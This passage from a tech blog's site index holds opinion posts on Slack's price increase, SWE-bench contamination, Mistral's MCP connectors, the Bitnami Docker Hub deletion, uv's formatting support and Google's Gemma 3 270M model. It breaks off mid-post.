Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Privacy","type":"tags"},{"content":"A post titled \u0026ldquo;Slack has raised our charges by $195k per year\u0026rdquo; exploded across Hacker News this week, hitting over 3,400 points and generating nearly 1,500 comments. The numbers are staggering, but the real story isn\u0026rsquo;t about one company\u0026rsquo;s pricing decision — it\u0026rsquo;s about a structural problem in how we\u0026rsquo;ve built our technology stacks.\nThe Pricing Shock # The details from the original post paint a grim picture. An organization that had been paying a certain rate for Slack Enterprise suddenly received a renewal quote with a $195,000 annual increase. Not a gradual ramp. Not a modest inflationary adjustment. A sudden, substantial jump that forces a binary choice: absorb the cost or migrate away.\nThis pattern should feel familiar. Salesforce does it. Oracle does it. AWS does it (more subtly, through the complexity of their pricing models). Once your organization is deeply embedded in a platform — your workflows, integrations, institutional knowledge, and data all living there — the switching costs become enormous. And that\u0026rsquo;s when the price increases come.\nSlack specifically has been on this trajectory since the Salesforce acquisition. The integration with Salesforce\u0026rsquo;s broader enterprise sales machine has shifted Slack from a bottoms-up developer tool to a top-down enterprise platform with enterprise pricing to match. The product may not have changed much, but the go-to-market motion certainly has.\nThe Hidden Cost of Platform Dependency # Here\u0026rsquo;s what the $195K number actually represents: the price of dependency. Every Slack bot you\u0026rsquo;ve built, every workflow automation, every integration with your ticketing system, monitoring tools, and deployment pipelines — all of that represents switching costs. Salesforce (and every other enterprise SaaS vendor) knows exactly how embedded they are in your operations, and they price accordingly.\nI\u0026rsquo;ve seen this movie before, multiple times across my career. In the early 2000s, it was Oracle database licensing. In the 2010s, it was VMware. Now it\u0026rsquo;s SaaS platforms. The pattern is always the same:\nOffer a compelling product at a reasonable price Achieve deep organizational penetration Get acquired by (or become) a company focused on maximizing revenue per customer Raise prices because switching costs make it rational for customers to pay The frustration in the Hacker News comments was palpable. Engineers who had championed Slack within their organizations now feel betrayed. But the reality is that this outcome was predictable the moment Slack became critical infrastructure without any contractual price protection.\nWhat Engineering Leaders Should Do # If this story has you nervously looking at your own SaaS bills, here\u0026rsquo;s a practical framework:\nAudit Your SaaS Stack # Most organizations have no idea how much they\u0026rsquo;re actually spending on SaaS. Shadow IT purchases, seat-based licenses for people who barely use the tool, overlapping functionality between platforms — it adds up quickly. Before you can optimize, you need visibility.\nRun a comprehensive audit. List every SaaS product, its cost, its contract renewal date, and critically, how deeply integrated it is with your workflows. That integration depth is your switching cost, and it\u0026rsquo;s your leverage (or lack thereof) in negotiations.\nBuild Abstraction Layers # For critical communication infrastructure, consider building abstraction layers in your integrations. Instead of having your deployment pipeline post directly to Slack\u0026rsquo;s API, have it post to an internal messaging abstraction that can route to Slack, Teams, Mattermost, or whatever comes next.\nYes, this is more work upfront. Yes, most teams won\u0026rsquo;t do it until they feel the pain. But the teams that have abstraction layers in place can credibly threaten to switch platforms during contract negotiations, and that threat is worth real money.\nEvaluate Open Source Alternatives # The Mattermost and Rocket.Chat communities are probably having a very good week. Self-hosted communication platforms have matured significantly, and for organizations with the engineering capacity to run them, they offer both cost predictability and data sovereignty.\nThe trade-off is operational overhead. Running a communication platform at scale isn\u0026rsquo;t trivial — you need to handle availability, security updates, mobile apps, and user support. But for organizations spending six figures or more on Slack, the math might work.\nNegotiate Aggressively # If you\u0026rsquo;re staying with Slack, use this moment as leverage. Salesforce\u0026rsquo;s sales team knows that this pricing controversy has organizations evaluating alternatives. Multi-year commitments with price caps, volume discounts, and contractual protections against sudden increases should all be on the table.\nThe Bigger Picture: SaaS Inflation # What we\u0026rsquo;re witnessing across the industry is a SaaS inflation crisis. The total cost of a modern technology stack — cloud infrastructure, communication, project management, CI/CD, monitoring, security tools — has been growing faster than most organizations\u0026rsquo; revenue. Something has to give.\nI think we\u0026rsquo;re heading toward a correction. Not a crash, but a rationalization. Organizations that treated SaaS spending as an afterthought are being forced to make hard choices. The \u0026ldquo;just put it on the company card\u0026rdquo; era of SaaS procurement is ending.\nThe smart move for engineering leaders is to get ahead of this. Don\u0026rsquo;t wait for your CFO to come asking why the technology budget is growing 30% year over year while revenue grows 10%. Build cost awareness into your engineering culture now. Evaluate open source alternatives not as a cost-cutting exercise but as a strategic hedge against vendor pricing power.\nMy Take # I have a lot of sympathy for the teams caught in this situation, but I have limited sympathy for the organizations that let it happen. We\u0026rsquo;ve known for decades that vendor lock-in leads to pricing power abuse. The SaaS model made it feel different because the switching costs were less visible — they\u0026rsquo;re in integrations and workflows rather than data format lock-in — but the dynamics are identical.\nMy rule of thumb: any tool that touches more than 50% of your engineering team\u0026rsquo;s daily workflow should be treated as critical infrastructure, with all the risk management that implies. That means contractual protections, switching cost analysis, and viable alternatives identified before you need them.\nA $195K price increase is painful. But the lesson is worth learning: in the cloud era, the rent can always go up.\nThis post is part of the Infrastructure Notes series, where I cover the tools, platforms, and practices that keep our systems running — or don\u0026rsquo;t.\n","date":"18 September 2025","externalUrl":null,"permalink":"/posts/250918-slack-price-hike-saas-costs/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A viral post about Slack’s massive price increase highlights the growing problem of SaaS cost escalation and what engineering teams can do about it.","title":"Slack Just Raised Prices by $195K — The SaaS Cost Reckoning Is Here","type":"posts"},{"content":"A bombshell dropped in the AI coding community this week: research published on the SWE-bench GitHub repository shows that top model scores on one of the most widely-cited benchmarks for AI coding ability may be significantly skewed by git history leaks. In plain terms: the models may have seen the answers during training.\nThis isn\u0026rsquo;t a minor methodological quibble. SWE-bench has become the primary yardstick that companies use to claim their AI coding assistant is better than the competition. If those scores are unreliable, a lot of the narrative around AI coding progress needs recalibrating.\nUnderstanding the Contamination # SWE-bench works by presenting AI models with real GitHub issues from popular open-source projects and asking them to generate the correct fix. The benchmark includes the issue description, the codebase at the time of the issue, and evaluates whether the model\u0026rsquo;s patch resolves the problem.\nThe contamination problem is straightforward: if a model was trained on data that includes the git history of these repositories — including the commits that actually fixed these issues — then the model isn\u0026rsquo;t demonstrating reasoning ability. It\u0026rsquo;s doing sophisticated pattern matching against memorized solutions.\nGit history is a particularly insidious source of contamination because it\u0026rsquo;s everywhere. Any training dataset that includes GitHub data (which is\u0026hellip; most of them) potentially contains the exact patches that SWE-bench tests for. Even if you filter out the specific files involved in benchmark tasks, git commit messages, pull request discussions, and code review comments often contain enough information to reconstruct the solution.\nThe researchers found that when they controlled for contamination — testing on issues that couldn\u0026rsquo;t have appeared in training data — model performance dropped significantly. The exact numbers vary by model, but the gap between contaminated and clean evaluations was large enough to change the leaderboard rankings.\nWhy This Matters Beyond Benchmarks # You might think: \u0026ldquo;Who cares about benchmark scores? I care about whether the tool actually helps me code.\u0026rdquo; And that\u0026rsquo;s fair. But benchmark contamination matters for several reasons that directly affect practitioners.\nResource allocation decisions: Companies are spending millions on AI coding tools based partly on benchmark performance. If those benchmarks don\u0026rsquo;t measure what they claim to measure, those investments might be misallocated. A team choosing between Copilot, Cursor, or another tool often looks at SWE-bench scores as a proxy for capability.\nResearch direction: The AI research community uses benchmarks to decide what approaches work. If contaminated benchmarks make certain architectures look better than they are, we might be pursuing dead ends while ignoring more promising paths.\nOverfitting to the test: There\u0026rsquo;s a well-documented phenomenon in education where \u0026ldquo;teaching to the test\u0026rdquo; produces students who score well but lack genuine understanding. The same thing happens with AI models. Optimizing for SWE-bench scores — especially when the test data leaks into training — produces models that look impressive on paper but may struggle with genuinely novel problems.\nThe Broader Benchmark Crisis # SWE-bench isn\u0026rsquo;t the only benchmark with contamination issues. This is a systemic problem across AI evaluation. HumanEval, MBPP, and most other coding benchmarks face similar risks. The internet is a giant corpus, and separating \u0026ldquo;training data\u0026rdquo; from \u0026ldquo;evaluation data\u0026rdquo; is increasingly difficult when models are trained on significant fractions of all publicly available text.\nSome approaches to mitigation include:\nTemporal cutoffs: Only testing on issues created after the model\u0026rsquo;s training data cutoff. This helps but doesn\u0026rsquo;t eliminate the problem — data leaks are messy and imprecise.\nPrivate benchmarks: Creating evaluation datasets that are never published. This works but limits reproducibility and community scrutiny.\nSynthetic benchmarks: Generating entirely new problems that couldn\u0026rsquo;t exist in any training corpus. This is promising but raises questions about whether synthetic problems are representative of real-world coding tasks.\nLive evaluation: Testing models on truly new, just-created issues in real-time. This is the gold standard but is expensive and difficult to standardize.\nI think the industry needs a combination of all four approaches. No single method is sufficient.\nWhat This Means for AI-Assisted Development # Here\u0026rsquo;s my practical take for developers using AI coding tools today: ignore the benchmarks and evaluate tools based on your own experience with your own codebase.\nI\u0026rsquo;ve been using various AI coding assistants for over a year now, and my assessment doesn\u0026rsquo;t correlate perfectly with benchmark scores. The tool that helps me most is the one that best understands the context of my specific project — the architecture, the conventions, the common patterns. That\u0026rsquo;s not something any generic benchmark can measure.\nSome concrete evaluation criteria that I find more meaningful than SWE-bench scores:\nContext handling: Can the tool effectively use your project\u0026rsquo;s existing code as context when generating suggestions? Error recovery: When the first suggestion is wrong (and it often is), how well does the tool iterate based on your feedback? Explanation quality: Can it explain why it\u0026rsquo;s suggesting a particular approach, not just what code to write? Edge case awareness: Does it handle error cases, null checks, and boundary conditions, or does it only generate the happy path? The Trust Problem # There\u0026rsquo;s a deeper issue at play. The AI industry has a credibility problem when it comes to self-reported performance metrics. When the same companies that build the models also choose which benchmarks to highlight, cherry-picking is inevitable. The SWE-bench contamination issue is just the most visible example of a broader pattern where impressive-sounding numbers don\u0026rsquo;t always translate to real-world utility.\nThis matters because trust is the foundation of adoption. Developers are pragmatic — we adopt tools that make us more productive and abandon those that don\u0026rsquo;t. But the evaluation and marketing of AI tools has become so benchmark-driven that it\u0026rsquo;s genuinely difficult to separate signal from noise.\nMy Take # I\u0026rsquo;ve been saying for a while that we need better ways to evaluate AI coding tools, and this week\u0026rsquo;s news makes that case more urgently. SWE-bench was a genuinely innovative benchmark when it launched — testing on real-world issues from real projects was a big step forward from toy problems. But the contamination issue means we can\u0026rsquo;t trust the scores at face value.\nMy hope is that this revelation drives investment in better evaluation methodology. The research community knows how to build robust benchmarks — it just requires more effort and expense than training a model and cherry-picking a favorable number.\nIn the meantime, be skeptical of any company that leads their marketing with benchmark scores. The real test of an AI coding tool is whether it makes you more productive on your code. Everything else is just marketing.\nThis post is part of the AI in Development series, where I track how artificial intelligence is reshaping the tools and practices of software engineering.\n","date":"11 September 2025","externalUrl":null,"permalink":"/posts/250911-swe-bench-git-history-leaks/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Research reveals that top AI coding model scores on SWE-bench may be inflated due to git history leaks, raising fundamental questions about how we evaluate AI coding capabilities.","title":"SWE-bench Benchmark Contamination — When the Test Answers Are in the Training Data","type":"posts"},{"content":"Mistral announced this week that Le Chat now supports custom MCP connectors and persistent memory. On its own, adding tool-use features to yet another AI chatbot isn\u0026rsquo;t exactly groundbreaking. But the choice to build on the Model Context Protocol (MCP) — rather than inventing a proprietary integration layer — is the real story here, and it tells us a lot about where AI tooling is heading.\nMCP: From Anthropic Side Project to Industry Standard # For those not tracking the protocol wars in AI tooling, MCP (Model Context Protocol) was originally introduced by Anthropic as an open standard for connecting AI models to external tools and data sources. The concept is straightforward: define a standard way for AI systems to discover, invoke, and receive results from external tools, regardless of which model or platform you\u0026rsquo;re using.\nWhat\u0026rsquo;s remarkable is the adoption curve. In just a few months, MCP has gone from \u0026ldquo;interesting idea from one AI company\u0026rdquo; to something that OpenAI, Google, and now Mistral are all implementing. This kind of rapid convergence on a shared protocol is unusual in tech — we usually spend years arguing about standards before anything gets adopted (looking at you, every web services standard from 2005-2015).\nThe reason for the quick adoption is pragmatic: nobody wants to build N×M integrations where N is the number of AI platforms and M is the number of external tools. MCP gives you a single integration point. Build an MCP server for your database, your CRM, your monitoring system, and every AI platform that speaks MCP can use it. That\u0026rsquo;s a powerful value proposition.\nWhat Mistral Actually Shipped # Le Chat\u0026rsquo;s implementation includes several notable features. First, users can configure custom MCP connectors, meaning you can point Le Chat at any MCP-compatible server and the model can interact with it. This could be a company\u0026rsquo;s internal knowledge base, a project management tool, or a code repository.\nSecond, they\u0026rsquo;ve added persistent memory — the ability for Le Chat to remember context across conversations. This is distinct from simply having a long context window. Memory here means the system actively stores and retrieves relevant information from past interactions, building a working model of your preferences, projects, and patterns.\nThe combination is more interesting than either feature alone. An AI assistant with both tool access and memory can do things like: \u0026ldquo;Remember that I\u0026rsquo;m working on the payment service migration? Pull the latest error logs from our monitoring system and compare them against the issues we discussed last Tuesday.\u0026rdquo; That\u0026rsquo;s a fundamentally different interaction model than a stateless chatbot.\nThe Developer Tooling Implications # For developers, the MCP ecosystem is creating a new category of infrastructure to build and maintain. If you\u0026rsquo;re running any kind of internal tooling, you should be thinking about MCP servers.\nHere\u0026rsquo;s a concrete example. Say your team uses a custom deployment system. Today, an engineer might ask an AI assistant about deployment best practices and get generic advice. With an MCP connector to your deployment system, the assistant can see your actual deployment history, understand your specific configuration, and give contextual advice based on your real infrastructure.\nThe protocol itself is designed around JSON-RPC 2.0, which means implementing an MCP server is approachable for most backend developers. You define your tools (with schemas describing their inputs and outputs), expose them via the protocol, and any MCP-capable client can discover and use them.\nI\u0026rsquo;ve been experimenting with building MCP servers for some of my own infrastructure, and the developer experience is surprisingly smooth. A basic server that exposes a few tools can be built in an afternoon. The harder part is thinking carefully about what operations you want an AI to be able to perform and what guardrails you need.\nThe Emerging AI Middleware Stack # What we\u0026rsquo;re watching form is essentially a middleware layer for AI. Just as the 2010s saw the emergence of an API economy with REST as the lingua franca, the mid-2020s are producing an AI tool economy with MCP as the integration standard.\nThis has some interesting second-order effects:\nFor platform companies: Supporting MCP becomes table stakes. Mistral\u0026rsquo;s move this week puts pressure on any AI platform that hasn\u0026rsquo;t adopted it yet. The network effect here is strong — the more tools speak MCP, the more valuable MCP-compatible platforms become.\nFor tool builders: There\u0026rsquo;s a land grab happening for MCP server implementations. The team that builds the best MCP server for Jira, or Salesforce, or GitHub, captures a lot of value. It\u0026rsquo;s analogous to the early days of Zapier or IFTTT, but for AI tool access.\nFor enterprises: MCP presents both opportunity and risk. The opportunity is genuine productivity gains from AI that can access your actual systems. The risk is the security surface area — every MCP connector is a potential path for an AI to access (and potentially modify) sensitive data.\nSecurity Considerations # Speaking of security, this is the area where I think the industry is moving too fast. MCP connectors that give AI systems read access to production databases, deployment pipelines, or customer data need extremely careful authentication and authorization design.\nThe current state of MCP security is\u0026hellip; evolving. OAuth-based auth flows are supported, but the granularity of permission models varies widely between implementations. An MCP server that gives \u0026ldquo;read access to the monitoring system\u0026rdquo; might also expose sensitive customer data in log entries. The blast radius of a misconfigured connector could be significant.\nMy recommendation: start with read-only MCP connectors in non-production environments. Build your security model iteratively, and don\u0026rsquo;t let enthusiasm for AI productivity gains outrun your security review process.\nMy Take # I\u0026rsquo;m genuinely optimistic about MCP as a protocol. The AI industry desperately needs standards that prevent vendor lock-in and reduce integration complexity. MCP isn\u0026rsquo;t perfect, but it\u0026rsquo;s good enough and it\u0026rsquo;s gaining momentum fast enough that it might actually stick.\nMistral\u0026rsquo;s adoption of MCP is particularly interesting because it validates the protocol from a non-Anthropic perspective. When the creator of a standard uses it, that\u0026rsquo;s expected. When competitors adopt it too, that\u0026rsquo;s a signal.\nWhat I\u0026rsquo;m watching for next is whether MCP becomes the standard for AI-to-AI communication, not just AI-to-tool communication. As we build systems with multiple specialized agents, they\u0026rsquo;ll need a common protocol to collaborate. MCP might evolve to fill that role, or something new might emerge. Either way, we\u0026rsquo;re in the early innings of a very significant infrastructure shift.\nThis post is part of the AI in Development series, where I track how artificial intelligence is reshaping the tools and practices of software engineering.\n","date":"4 September 2025","externalUrl":null,"permalink":"/posts/250904-mistral-le-chat-mcp-connectors/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Mistral adds custom MCP connectors and persistent memory to Le Chat, signaling that the Model Context Protocol is becoming the standard glue for AI tool integration.","title":"Mistral's Le Chat Gets MCP Connectors — The Protocol That's Quietly Connecting Everything","type":"posts"},{"content":"","date":"28 August 2025","externalUrl":null,"permalink":"/tags/docker/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Docker","type":"tags"},{"content":"If you woke up this week to broken deployments and scrambled to figure out why your containers wouldn\u0026rsquo;t pull, you weren\u0026rsquo;t alone. Broadcom quietly deleted the docker.io/bitnami namespace from Docker Hub, taking with it one of the most widely-used collections of pre-built application containers in the ecosystem. For teams running Redis, PostgreSQL, WordPress, Kafka, or any of dozens of other services via Bitnami images, this was a very bad morning.\nThe news spread rapidly across developer communities, with the official Broadcom announcement doing little to soften the blow. Let me walk through what happened, why it matters, and what you should be doing differently.\nWhat Actually Happened # Bitnami has been a staple of the container ecosystem for years. Their pre-packaged, regularly updated images made it trivially easy to spin up complex services. Need a properly configured Kafka cluster? docker pull bitnami/kafka and you were off. When Broadcom acquired VMware (which had previously acquired Bitnami), the writing was on the wall for anyone paying attention — but the speed and completeness of this deletion caught many off guard.\nThe images weren\u0026rsquo;t deprecated with a sunset timeline. They weren\u0026rsquo;t moved to a new namespace with redirects. They were simply\u0026hellip; gone. If your Kubernetes manifests, Docker Compose files, or CI/CD pipelines referenced docker.io/bitnami/*, they stopped working. No warning, no migration path announced beforehand.\nThis is particularly painful because Bitnami images had become something of a de facto standard. Helm charts across the ecosystem default to Bitnami images. Internal documentation at countless companies says \u0026ldquo;just use the Bitnami image.\u0026rdquo; I\u0026rsquo;ve personally recommended them in architecture reviews for years.\nThe Registry Dependency Problem # This incident exposes a fundamental fragility in how most organizations manage their container supply chain. We\u0026rsquo;ve collectively built an infrastructure pattern where thousands of production systems depend on the continued existence and availability of specific image tags on a third-party registry.\nThink about it: your production Kubernetes cluster, running your revenue-generating application, depends on being able to pull an image from a namespace controlled by a corporation that may decide at any moment to restructure, rebrand, or simply delete things. This isn\u0026rsquo;t a theoretical risk anymore.\nThe mitigation isn\u0026rsquo;t complicated, but it requires discipline:\nRun a private registry — Harbor, GitLab Container Registry, AWS ECR, Azure ACR. Mirror every external image you depend on. Pin image digests, not tags — bitnami/redis:7.2 is a moving target. bitnami/redis@sha256:abc123... is immutable (assuming the registry keeps it). Build your own base images — Yes, it\u0026rsquo;s more work. But you control the supply chain entirely. Treat container images like vendored dependencies — You wouldn\u0026rsquo;t let your Go modules or npm packages disappear from under you (well, we learned that lesson too). I\u0026rsquo;ve been running a Harbor instance for my own projects for a few years now, and I mirror every upstream image I use. It adds maybe 30 minutes to my setup process for a new project, but events like this validate that investment completely.\nThe Broadcom Effect # Let\u0026rsquo;s zoom out a bit. This isn\u0026rsquo;t an isolated incident — it\u0026rsquo;s part of a pattern. Since Broadcom\u0026rsquo;s acquisition of VMware closed, the company has been aggressively restructuring, re-licensing, and consolidating. VMware licensing changes have already pushed many organizations to evaluate alternatives. The Bitnami deletion is another data point in the same trend.\nWhen a company focused on maximizing acquisition value takes over developer-beloved tools, the tools often suffer. We\u0026rsquo;ve seen this play out with Oracle and Java, with IBM and Red Hat (though that\u0026rsquo;s been more nuanced), and now with Broadcom and the VMware ecosystem.\nThe broader lesson is about organizational dependency. Open source software is only as reliable as the entity hosting it. The code itself might be free, but the distribution infrastructure — registries, package managers, CDNs — represents real costs that somebody has to bear. When the entity bearing those costs changes priorities, you feel it.\nWhat Teams Should Do Right Now # If you\u0026rsquo;re still recovering from this week\u0026rsquo;s outage, here\u0026rsquo;s the immediate action plan:\nShort term: Find where Bitnami images were being used. Check your Dockerfiles, Compose files, Helm charts, and CI pipelines. Broadcom has indicated that images will be available through their own registry, so update your references accordingly — but don\u0026rsquo;t just point to the new location and call it done.\nMedium term: Set up image mirroring. Every external image your production systems use should be cached in a registry you control. This is non-negotiable for any serious deployment.\nLong term: Evaluate whether you actually need pre-built images at all. For many services, building from the official upstream image (e.g., the official redis image on Docker Hub, maintained by the Docker community) is just as easy and removes the Bitnami dependency entirely.\nMy Take # I\u0026rsquo;ll be honest — I\u0026rsquo;m annoyed but not surprised. The consolidation of open source tooling under large corporate umbrellas has been accelerating, and the incentives don\u0026rsquo;t align with long-term community stewardship. Bitnami was enormously valuable precisely because it was reliable and consistent. That reliability was always contingent on someone choosing to maintain it.\nThe container ecosystem has matured enough that we should treat image registries with the same skepticism we treat any external dependency. Mirror everything. Pin everything. Trust nothing you don\u0026rsquo;t control.\nThirty years in this industry has taught me one thing above all: the infrastructure you depend on will eventually be pulled out from under you. Plan accordingly.\nThis post is part of the Infrastructure Notes series, where I cover the tools, platforms, and practices that keep our systems running — or don\u0026rsquo;t.\n","date":"28 August 2025","externalUrl":null,"permalink":"/posts/250828-bitnami-docker-deletion/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Broadcom’s deletion of Bitnami images from Docker Hub is a wake-up call about depending on container registries you don’t control.","title":"The Bitnami Docker.io Deletion — When Your Infrastructure Disappears Overnight","type":"posts"},{"content":"Astral, the company behind the Ruff linter and uv package manager, just announced experimental code formatting support in uv. If you\u0026rsquo;ve been following the Python tooling evolution, this is another significant step in what\u0026rsquo;s becoming one of the most ambitious consolidation efforts in any language ecosystem.\nFor context: uv started as a pip replacement — a fast package installer written in Rust. Then it absorbed virtual environment management. Then project management. Then Python version management. Now it\u0026rsquo;s adding code formatting. At some point, you have to step back and ask: is this the right approach, or is one tool trying to do too much?\nThe Case for Consolidation # Let me start with why this matters. The traditional Python development setup involves juggling multiple tools:\npyenv or python-build for Python version management venv or virtualenv for virtual environments pip (and maybe pip-tools or pip-compile) for package installation poetry or pdm for project management and dependency resolution black or autopep8 for code formatting ruff or flake8 for linting mypy or pyright for type checking That\u0026rsquo;s seven or more tools, each with its own configuration file, its own update cycle, and its own quirks. Compared to ecosystems like Rust (cargo does almost everything) or Go (the go tool handles building, testing, formatting, and dependency management), Python has felt fragmented.\nuv\u0026rsquo;s approach is to collapse this stack. One tool, written in Rust for performance, handling everything from installing Python itself to formatting your code. The appeal is obvious: fewer tools to install, configure, and keep updated. One consistent CLI interface. One configuration file.\nWhat the Formatting Integration Looks Like # The experimental formatting support in uv leverages the same Rust codebase that powers Ruff\u0026rsquo;s formatter. This isn\u0026rsquo;t a separate tool bundled in — it\u0026rsquo;s deeply integrated. You run uv fmt and your code gets formatted according to your project configuration.\nThe integration means formatting is aware of your project context. It knows your Python version target, your dependency tree, and your project structure. This contextual awareness allows for smarter formatting decisions and better error messages when things go wrong.\nPerformance is, as expected, excellent. Formatting a large codebase takes milliseconds rather than seconds. When you\u0026rsquo;re running formatting on every save or in a pre-commit hook, that speed difference compounds into meaningful productivity gains.\nThe Concerns # I\u0026rsquo;m broadly positive about uv, but I think the consolidation trajectory deserves some critical examination.\nSingle point of failure: When one tool handles everything, a bug in that tool can block your entire workflow. If uv has a packaging bug, you can\u0026rsquo;t install dependencies. If it has a formatting bug, your CI pipeline breaks. With separate tools, a bug in Black doesn\u0026rsquo;t affect your ability to install packages.\nVendor concentration: Astral is a VC-funded startup. The Python ecosystem\u0026rsquo;s core tooling becoming dependent on a single company\u0026rsquo;s product is a legitimate concern. This mirrors broader concerns about infrastructure consolidation in cloud and open source ecosystems. What happens if Astral\u0026rsquo;s business model doesn\u0026rsquo;t work out? The code is open source, which provides some insurance, but maintaining a project this complex requires sustained investment.\nThe Bazaar vs. the Cathedral: Python\u0026rsquo;s tooling fragmentation isn\u0026rsquo;t just a historical accident — it reflects the language\u0026rsquo;s culture of diverse approaches and community-driven development. There\u0026rsquo;s value in having multiple tools competing and innovating. When one tool dominates, that competitive pressure diminishes.\nConfiguration migration: If you\u0026rsquo;ve invested time configuring Black, isort, flake8, and mypy separately, migrating to a unified uv configuration isn\u0026rsquo;t trivial. The tools have subtly different defaults and behaviors, and ensuring your formatting output doesn\u0026rsquo;t change during migration requires careful testing.\nThe Broader Trend # What\u0026rsquo;s happening with uv reflects a broader trend across programming language ecosystems: developers want batteries-included toolchains. The success of cargo (Rust), go (Go), and even deno (JavaScript/TypeScript) demonstrates that having a single, opinionated tool that handles the common workflow is what most developers prefer.\nPython has historically resisted this approach — \u0026ldquo;there should be one obvious way to do it\u0026rdquo; is a Python zen principle, but Python tooling has been the poster child for having seventeen ways to do everything. uv is the most credible attempt to change that.\nThis week also saw the Ghostty project requiring AI tooling disclosure for contributions, which is an interesting parallel. As our tools become more powerful and more integrated, the question of transparency about what tools we use — and how much we depend on them — becomes increasingly important.\nMy Recommendation # If you\u0026rsquo;re starting a new Python project today, use uv. The speed improvements alone justify the switch, and the integrated workflow is genuinely pleasant. The formatting support is experimental, but Astral has a strong track record of shipping quality — Ruff went from unknown to industry standard in about a year. This kind of rapid iteration and improvement parallels what we\u0026rsquo;re seeing with AI-assisted development tools.\nIf you have existing projects with established tooling, don\u0026rsquo;t rush to migrate. Wait for the formatting support to stabilize, evaluate the migration path carefully, and switch when the benefits clearly outweigh the transition costs.\nAnd regardless of what tools you use, keep your configuration in version control, document your toolchain choices, and make sure your team can reproduce the development environment from scratch. Tool choices change; good engineering practices don\u0026rsquo;t.\nMy Take # I\u0026rsquo;ve watched Python\u0026rsquo;s tooling story evolve from distutils to setuptools to pip to poetry to uv, and each step has been an improvement. uv adding formatting feels like we\u0026rsquo;re approaching the endgame — a point where a single uv command can bootstrap an entire Python development environment from nothing.\nThat\u0026rsquo;s remarkable for a language that\u0026rsquo;s thirty years old. Most ecosystems this mature are stuck with their legacy tooling decisions. Python is getting a genuine fresh start on tooling, and so far, the results are impressive.\nWill I miss the days of carefully curating my pyproject.toml with separate Black, isort, and mypy sections? Not even slightly.\n","date":"21 August 2025","externalUrl":null,"permalink":"/posts/250821-uv-code-formatting-python-tooling/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The uv package manager experimentally adds code formatting, continuing its ambitious push to become a single tool for the entire Python development workflow.","title":"uv Adds Code Formatting — Python's Tooling Consolidation Continues","type":"posts"},{"content":"While everyone\u0026rsquo;s still digesting last week\u0026rsquo;s GPT-5 launch, Google quietly released something that might be more consequential for day-to-day development: Gemma 3 270M, a compact language model with just 270 million parameters that punches well above its weight class. In a world obsessed with scaling up, this is a compelling argument for scaling down.\nThe release landed on Hacker News with significant attention, and for good reason. When a model this small can handle useful tasks effectively, it changes the economics and accessibility of AI in ways that billion-parameter models simply can\u0026rsquo;t.\nWhy 270 Million Parameters Matters # To put this in perspective: GPT-5 likely has hundreds of billions of parameters (OpenAI doesn\u0026rsquo;t disclose exact numbers). Gemma 3 270M has roughly a thousand times fewer. And yet, for a surprising range of tasks, this tiny model delivers genuinely useful results.\nIt runs on anything. A 270M parameter model fits comfortably on a smartphone, a Raspberry Pi, or a low-end laptop. No GPU required, no cloud API calls, no usage fees. You download it and run it locally. This isn\u0026rsquo;t a future promise — it works today.\nInference is fast. On even modest hardware, you\u0026rsquo;re looking at response times measured in milliseconds, not seconds. For applications where latency matters — autocomplete, real-time suggestions, on-device processing — this speed advantage is enormous.\nPrivacy is built in. When the model runs on-device, your data never leaves the device. No API call logs, no third-party processing, no data retention policies to worry about. For applications dealing with sensitive data — healthcare, legal, financial — this is transformative.\nWhat It Can Actually Do # Let me be realistic about capabilities. A 270M parameter model isn\u0026rsquo;t going to write your architecture document or debug a complex distributed system. But here\u0026rsquo;s what it can do well:\nText classification and sentiment analysis work remarkably well at this scale. If you need to categorize support tickets, flag potentially sensitive content, or analyze user feedback, Gemma 3 270M handles these tasks with accuracy that would have required much larger models just a year ago.\nCode completion for common patterns is viable. Not complex multi-file refactoring, but the kind of boilerplate completion and pattern matching that makes a real difference in daily coding. Think: completing function signatures, generating standard error handling blocks, filling in common API call patterns. This complements the larger role AI assistants are playing in development workflows, with small models handling efficient edge cases.\nSummarization and extraction of structured information from documents works surprisingly well for a model this size. Pulling key fields from invoices, extracting entities from support emails, summarizing short documents — these practical tasks are well within reach.\nOn-device search and retrieval — when combined with a small embedding model, you can build a complete local search system that understands natural language queries without any cloud dependency.\nThe Architecture Story # What makes Gemma 3 270M interesting from a technical perspective is how Google achieved these capabilities at this scale. The model benefits from improved training techniques — better data curation, more efficient tokenization, and distillation from larger models in the Gemma family. This mirrors the broader architectural improvements happening in language models, where efficiency and capability become equally important.\nThis follows a trend that I think is underappreciated: the biggest advances in practical AI aren\u0026rsquo;t coming from making models bigger. They\u0026rsquo;re coming from making smaller models better. Techniques like knowledge distillation, quantization-aware training, and improved data quality are making it possible to pack more capability into fewer parameters.\nFor developers, this means the barrier to adding AI features to applications keeps dropping. You don\u0026rsquo;t need a GPU cluster or a five-figure monthly API bill. You need a good small model and a clear understanding of what task you\u0026rsquo;re solving.\nPractical Integration Patterns # If you\u0026rsquo;re considering using Gemma 3 270M (or similar small models) in your applications, here are patterns that work well:\nEdge preprocessing: Use the small model on-device for initial classification or filtering, then send only the complex cases to a larger cloud model. This dramatically reduces API costs and latency for the majority of requests.\nOffline-first applications: Build features that work without network connectivity. Mobile apps, field tools, embedded systems — the small model handles the common cases locally, syncing with more capable models when connectivity is available.\nPrivacy-sensitive pipelines: Process sensitive data locally with the small model, only sending anonymized or aggregated results to cloud services. This can simplify compliance with GDPR, HIPAA, and other data protection frameworks.\nDevelopment and testing: Use small models for rapid prototyping and testing of AI-powered features. The fast iteration cycle — no API calls, no rate limits, instant responses — accelerates development significantly.\nThe Open Source Advantage # Gemma 3 270M is released with open weights, which means the community can fine-tune it for specific domains and tasks. I expect we\u0026rsquo;ll see domain-specific versions appearing within weeks — a code-focused variant, a medical text variant, models fine-tuned for specific languages.\nThis is where small open models have an enormous advantage over large closed models. Fine-tuning a 270M parameter model is something you can do on a single consumer GPU in a few hours. Fine-tuning a 70B+ model requires significant infrastructure and expertise. The democratization of model customization at this scale is genuinely exciting.\nMy Take # In the rush to build and deploy ever-larger AI models, we sometimes lose sight of a fundamental engineering principle: use the smallest tool that gets the job done. Gemma 3 270M is a reminder that for many practical applications, the right model isn\u0026rsquo;t the most powerful one — it\u0026rsquo;s the most efficient 